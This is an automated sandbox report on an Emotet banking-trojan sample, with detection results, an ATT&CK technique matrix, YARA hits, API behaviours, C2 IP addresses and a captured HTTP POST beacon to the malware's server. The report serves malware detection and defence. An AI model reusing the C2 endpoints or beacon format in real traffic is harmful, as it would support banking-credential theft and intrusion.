
Analysis Report 3ki05193698.exe.vir

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 206247
Start date: 06.02.2020
Start time: 03:16:41
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 3ki05193698.exe.vir (renamed file extension from vir to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@6/0@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 61.5% (good quality ratio 59.5%)
  • Quality average: 82.2%
  • Quality standard deviation: 26.4%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 44
  • Number of non-executed functions: 448
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Emotet | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Sample may offer command line options; please run it with the 'Execute binary with arguments' cookbook (the command line switches may require additional characters such as "-", "/" or "--").



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Execution through API 131 | Hidden Files and Directories 1 | Valid Accounts 1 | Disabling Security Tools 1 | Input Capture 2 | System Time Discovery 2 | Remote File Copy 1 | Input Capture 2 | Data Encrypted 11 | Uncommonly Used Port 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Replication Through Removable Media | Command-Line Interface 2 | Valid Accounts 1 | Access Token Manipulation 1 | Software Packing 1 | Network Sniffing | Security Software Discovery 21 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Commonly Used Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Service Execution 12 | Modify Existing Service 11 | Process Injection 1 | Deobfuscate/Decode Files or Information 1 | Input Capture | System Service Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Remote File Copy 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | New Service 2 | New Service 2 | File Deletion 1 | Credentials in Files | File and Directory Discovery 2 | Logon Scripts | Input Capture | Data Encrypted | Standard Cryptographic Protocol 2 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 2 | Account Manipulation | System Information Discovery 36 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Masquerading 12 | Brute Force | Process Discovery 2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol 11 | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Hidden Files and Directories 1 | Two-Factor Authentication Interception | Application Window Discovery 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Valid Accounts 1 | Bash History | Network Service Scanning | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Access Token Manipulation 1 | Input Prompt | System Network Connections Discovery | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Process Injection 1 | Keychain | Process Discovery | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact

Signature Overview



AV Detection:

Antivirus detection for sample
Source: 3ki05193698.exe.exe; Avira: detection malicious, Label: TR/AD.Emotet.lnvbd
Found malware configuration
Source: driverthunk.exe.1836.4.memstr; Malware Configuration Extractor: Emotet {"C2 list": ["45.55.179.121/GfGV9Yv", "45.55.179.121:8080", "5.55.179.121:8080"]}
Multi AV Scanner detection for submitted file
Source: 3ki05193698.exe.exe; Virustotal: Detection: 77%
Machine Learning detection for sample
Source: 3ki05193698.exe.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.driverthunk.exe.400000.0.unpack; Avira: Label: TR/AD.Emotet.lnvbd
Source: 0.0.3ki05193698.exe.exe.400000.0.unpack; Avira: Label: TR/AD.Emotet.lnvbd
Source: 2.0.3ki05193698.exe.exe.400000.0.unpack; Avira: Label: TR/AD.Emotet.lnvbd
Source: 3.0.driverthunk.exe.400000.0.unpack; Avira: Label: TR/AD.Emotet.lnvbd

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00F51FFC
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,4_2_00F51F75
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F5207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_00F5207B
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51F56 CryptGetHashParam,4_2_00F51F56
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F5215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_00F5215A
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51F11 CryptExportKey,4_2_00F51F11

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_004305BD lstrlenA,FindFirstFileA,FindClose,0_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_0042885D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_004305BD lstrlenA,FindFirstFileA,FindClose,2_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_0042885D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49765 -> 45.55.179.121:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.2.5:49765 -> 45.55.179.121:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic; HTTP traffic detected: POST /GfGV9Yv HTTP/1.1
  Referer: http://45.55.179.121/GfGV9Yv
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.55.179.121:8080
  Content-Length: 630
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 47 66 47 56 39 59 76 3d 6e 64 42 25 32 46 25 32 42 47 38 47 33 31 6f 71 31 75 65 64 39 6b 39 4c 37 25 32 46 53 41 54 4e 65 79 4d 6f 6a 58 35 71 6b 4c 69 77 6d 25 32 42 51 4a 58 66 59 45 32 61 54 43 41 64 50 49 47 5a 59 41 41 25 32 42 73 78 39 4a 57 70 66 6b 76 48 68 58 49 4f 43 6b 25 32 42 39 4f 25 32 42 55 72 30 67 38 46 71 39 78 74 25 32 46 4b 75 6e 74 67 69 33 62 57 78 77 6e 45 7a 6d 71 7a 4c 48 66 67 36 44 34 37 42 41 4f 76 48 63 43 77 53 53 67 66 6c 55 79 63 4c 6e 64 39 4d 33 6d 67 66 30 57 43 62 69 32 6c 76 53 77 41 6c 67 48 5a 34 4b 30 6f 4a 44 4e 43 70 57 6c 6f 33 73 25 32 46 64 44 66 72 78 66 35 67 53 76 54 5a 35 4f 4f 46 5a 6b 42 47 4f 71 41 25 32 42 57 48 33 64 51 48 55 79 25 32 42 4f 38 35 73 38 4e 50 76 44 34 55 66 70 74 52 53 57 35 4a 76 4c 75 79 76 77 30 38 4e 66 79 4a 61 61 46 6d 77 25 32 46 51 50 33 67 66 71 5a 31 57 4a 68 70 49 52 49 25 32 46 4b 36 46 54 57 5a 66 45 37 58 4f 46 6c 38 33 30 52 53 49 73 34 35 39 66 76 43 52 30 63 30 48 41 5a 62 43 77 34 52 32 74 70 6b 34 44 4f 6e 4a 42 68 67 77 49 6b 6f 41 50 56 36 53 62 49 4c 59 74 69 65 62 39 6d 49 4e 5a 74 56 70 77 33 64 4c 4b 65 36 59 75 6b 49 48 55 33 4e 45 41 6d 41 33 68 25 32 46 52 63 5a 4a 45 72 58 68 71 51 65 36 31 47 39 48 30 47 6b 7a 48 71 39 75 72 6c 62 64 55 49 67 37 68 70 57 59 57 62 58 50 50 62 30 31 78 74 59 39 39 56 62 69 66 59 38 64 32 65 49 71 52 45 56 36 47 31 71 4d 52 73 4d 76 42 62 37 5a 47 53 4e 5a 65 25 32 46 38 46 73 55 6a 42 6d 62 38 64 38 4b 73 4d 44 70 6a 6a 6e 77 72 64 7a 67 77 6a 53 25 32 46 71 70 35 61 64 63 51 4a 58 6f 79 71 76 52 38 59 4f 36 43 50 5a 7a 48 42 54 72 59 6a 79 6e 7a 70 4e 62 4a 62 61 51 61 67 59 44 48 71 47 39 49 68 36 44 6a 43 61 6c 6c 6e 52 57 6b 54 6b 62 50 61 6e 54 56 74 42 7a 74 46 6c 45 6e 30 64 49 58 51 58 30 6b 73 75 6a 33 68 50 38 51 76 53 64 6e 75 6b 45 47 73 74 76 55 49 42 69 6a 31 36 7a 4c 6b 69 38 25 32 42 41 4a 67 25 33 44 25 33 44
  Data Ascii: GfGV9Yv=ndB%2F%2BG8G31oq1ued9k9L7%2FSATNeyMojX5qkLiwm%2BQJXfYE2aTCAdPIGZYAA%2Bsx9JWpfkvHhXIOCk%2B9O%2BUr0g8Fq9xt%2FKuntgi3bWxwnEzmqzLHfg6D47BAOvHcCwSSgflUycLnd9M3mgf0WCbi2lvSwAlgHZ4K0oJDNCpWlo3s%2FdDfrxf5gSvTZ5OOFZkBGOqA%2BWH3dQHUy%2BO85s8NPvD4UfptRSW5JvLuyvw08NfyJaaFmw%2FQP3gfqZ1WJhpIRI%2FK6FTWZfE7XOFl830RSIs459fvCR0c0HAZbCw4R2tpk4DOnJBhgwIkoAPV6SbILYtieb9mINZtVpw3dLKe6YukIHU3NEAmA3h%2FRcZJErXhqQe61G9H0GkzHq9urlbdUIg7hpWYWbXPPb01xtY99VbifY8d2eIqREV6G1qMRsMvBb7ZGSNZe%2F8FsUjBmb8d8KsMDpjjnwrdzgwjS%2Fqp5adcQJXoyqvR8YO6CPZzHBTrYjynzpNbJbaQagYDHqG9Ih6DjCallnRWkTkbPanTVtBztFlEn0dIXQX0ksuj3hP8QvSdnukEGstvUIBij16zLki8%2BAJg%3D%3D
Connects to IPs without corresponding DNS lookups
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknown; TCP traffic detected without corresponding DNS query: 45.55.179.121
Contains functionality to download additional files from the internet
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51383 InternetReadFile,4_2_00F51383
Posts data to webserver
Source: unknown; HTTP traffic detected: POST /GfGV9Yv HTTP/1.1
  Referer: http://45.55.179.121/GfGV9Yv
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.55.179.121:8080
  Content-Length: 630
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 47 66 47 56 39 59 76 3d 6e 64 42 25 32 46 25 32 42 47 38 47 33 31 6f 71 31 75 65 64 39 6b 39 4c 37 25 32 46 53 41 54 4e 65 79 4d 6f 6a 58 35 71 6b 4c 69 77 6d 25 32 42 51 4a 58 66 59 45 32 61 54 43 41 64 50 49 47 5a 59 41 41 25 32 42 73 78 39 4a 57 70 66 6b 76 48 68 58 49 4f 43 6b 25 32 42 39 4f 25 32 42 55 72 30 67 38 46 71 39 78 74 25 32 46 4b 75 6e 74 67 69 33 62 57 78 77 6e 45 7a 6d 71 7a 4c 48 66 67 36 44 34 37 42 41 4f 76 48 63 43 77 53 53 67 66 6c 55 79 63 4c 6e 64 39 4d 33 6d 67 66 30 57 43 62 69 32 6c 76 53 77 41 6c 67 48 5a 34 4b 30 6f 4a 44 4e 43 70 57 6c 6f 33 73 25 32 46 64 44 66 72 78 66 35 67 53 76 54 5a 35 4f 4f 46 5a 6b 42 47 4f 71 41 25 32 42 57 48 33 64 51 48 55 79 25 32 42 4f 38 35 73 38 4e 50 76 44 34 55 66 70 74 52 53 57 35 4a 76 4c 75 79 76 77 30 38 4e 66 79 4a 61 61 46 6d 77 25 32 46 51 50 33 67 66 71 5a 31 57 4a 68 70 49 52 49 25 32 46 4b 36 46 54 57 5a 66 45 37 58 4f 46 6c 38 33 30 52 53 49 73 34 35 39 66 76 43 52 30 63 30 48 41 5a 62 43 77 34 52 32 74 70 6b 34 44 4f 6e 4a 42 68 67 77 49 6b 6f 41 50 56 36 53 62 49 4c 59 74 69 65 62 39 6d 49 4e 5a 74 56 70 77 33 64 4c 4b 65 36 59 75 6b 49 48 55 33 4e 45 41 6d 41 33 68 25 32 46 52 63 5a 4a 45 72 58 68 71 51 65 36 31 47 39 48 30 47 6b 7a 48 71 39 75 72 6c 62 64 55 49 67 37 68 70 57 59 57 62 58 50 50 62 30 31 78 74 59 39 39 56 62 69 66 59 38 64 32 65 49 71 52 45 56 36 47 31 71 4d 52 73 4d 76 42 62 37 5a 47 53 4e 5a 65 25 32 46 38 46 73 55 6a 42 6d 62 38 64 38 4b 73 4d 44 70 6a 6a 6e 77 72 64 7a 67 77 6a 53 25 32 46 71 70 35 61 64 63 51 4a 58 6f 79 71 76 52 38 59 4f 36 43 50 5a 7a 48 42 54 72 59 6a 79 6e 7a 70 4e 62 4a 62 61 51 61 67 59 44 48 71 47 39 49 68 36 44 6a 43 61 6c 6c 6e 52 57 6b 54 6b 62 50 61 6e 54 56 74 42 7a 74 46 6c 45 6e 30 64 49 58 51 58 30 6b 73 75 6a 33 68 50 38 51 76 53 64 6e 75 6b 45 47 73 74 76 55 49 42 69 6a 31 36 7a 4c 6b 69 38 25 32 42 41 4a 67 25 33 44 25 33 44
  Data Ascii: GfGV9Yv=ndB%2F%2BG8G31oq1ued9k9L7%2FSATNeyMojX5qkLiwm%2BQJXfYE2aTCAdPIGZYAA%2Bsx9JWpfkvHhXIOCk%2B9O%2BUr0g8Fq9xt%2FKuntgi3bWxwnEzmqzLHfg6D47BAOvHcCwSSgflUycLnd9M3mgf0WCbi2lvSwAlgHZ4K0oJDNCpWlo3s%2FdDfrxf5gSvTZ5OOFZkBGOqA%2BWH3dQHUy%2BO85s8NPvD4UfptRSW5JvLuyvw08NfyJaaFmw%2FQP3gfqZ1WJhpIRI%2FK6FTWZfE7XOFl830RSIs459fvCR0c0HAZbCw4R2tpk4DOnJBhgwIkoAPV6SbILYtieb9mINZtVpw3dLKe6YukIHU3NEAmA3h%2FRcZJErXhqQe61G9H0GkzHq9urlbdUIg7hpWYWbXPPb01xtY99VbifY8d2eIqREV6G1qMRsMvBb7ZGSNZe%2F8FsUjBmb8d8KsMDpjjnwrdzgwjS%2Fqp5adcQJXoyqvR8YO6CPZzHBTrYjynzpNbJbaQagYDHqG9Ih6DjCallnRWkTkbPanTVtBztFlEn0dIXQX0ksuj3hP8QvSdnukEGstvUIBij16zLki8%2BAJg%3D%3D
Urls found in memory or binary data
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmp; String found in binary or memory: http://45.55.179.121/GfGV9Yv
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmp; String found in binary or memory: http://45.55.179.121:8080/GfGV9Yv
Source: driverthunk.exe, 00000004.00000002.2793045507.0000000000670000.00000004.00000020.sdmp; String found in binary or memory: http://45.55.179.121:8080/GfGV9Yve
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmp; String found in binary or memory: http://45.55.179.121:8080/GfGV9Yvv
Source: 3ki05193698.exe.exe; String found in binary or memory: http://www.codeproject.com/KB/dialog/xfontdialog.aspx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: 3ki05193698.exe.exe, 00000000.00000002.1999644391.0000000000760000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_0042E2A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_0041A743
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0041501F
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00409DC5
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00431EC2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00437FA6 GetKeyState,GetKeyState,GetKeyState,0_2_00437FA6
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,2_2_0042E2A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,2_2_0041A743
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState,2_2_0041501F
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_00409DC5
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_00431EC2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00437FA6 GetKeyState,GetKeyState,GetKeyState,2_2_00437FA6

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F5E20C
Yara detected Emotet
Source: Yara match; File source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,4_2_00F51F75

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet Payload, Author: kevoreilly
Contains functionality to delete services
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F5E3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_00F5E3D8
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F51D2B CreateProcessAsUserW,CreateProcessW,4_2_00F51D2B
Creates files inside the system directory
Source: C:\Windows\SysWOW64\driverthunk.exe; File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; File deleted: C:\Windows\SysWOW64\driverthunk.exe:Zone.Identifier
Detected potential crypto function
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0045400D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0044A090
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_004601D2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0044C59A
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00460716
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00446BF6
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0043CDE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00460D86
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00461001
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0043D2BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00461306
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0045B40D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0045B60B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0044D621
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0043D691
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00461ACA
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00423AE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0043DA9D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00463B1C
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00457C43
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0045FCA7
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0040BDDB
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_0043DEBD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_007428C1
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_007430E4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_007430E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_02282F82
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_022837A9
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_022837A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0045400D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0044A090
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_004601D2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0044C59A
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00460716
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00446BF6
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0043CDE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00460D86
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00461001
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0043D2BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00461306
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0045B40D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0045B60B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0044D621
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0043D691
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00461ACA
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00423AE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0043DA9D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00463B1C
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_00457C43
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0045FCA7
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0040BDDB
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_0043DEBD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_005F28C1
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_005F30E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 2_2_005F30E4
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 3_2_006037A5
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 3_2_006037A9
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 3_2_00602F82
